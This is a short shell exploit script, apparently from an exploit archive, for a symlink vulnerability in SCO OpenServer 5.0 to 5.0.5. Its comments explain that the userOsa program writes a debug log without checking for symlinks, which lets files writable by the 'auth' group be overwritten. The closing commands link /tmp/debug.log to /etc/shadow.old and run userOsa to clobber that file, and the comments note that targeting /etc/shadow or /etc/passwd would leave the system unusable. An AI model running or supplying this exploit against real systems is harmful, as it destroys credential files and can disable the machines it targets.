#!/bin/sh
#
# Under certain versions of SCO OpenServer there exists a
# symlink vulnerability which can be exploited to overwrite
# any file which is group writable by the 'auth' group.
#
# The problem in particular is in the the
# /etc/sysadm.d/bin/userOsa executable. When given garbage
# output the program will write out a debug log. However,
# the program does not check to see if it overwriting a
# currently existing file nor wether it is following a
# symlink. Therefore is it possible to overwrite files with
# debug data which are both in the 'auth' group and are
# writable by the same group. Both /etc/shadow & /etc/passwd
# fall into this category. If such an attack were launched
# against these files the system would be rendered unusable.
#
#                                         ..Brock Tellier
#
#    vulnerable: SCO Open Server 5.0 -> 5.0.5
#
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #

cd /tmp
ln -s /etc/shadow.old debug.log
/etc/sysadm.d/bin/userOsa

#                     www.hack.co.za                     #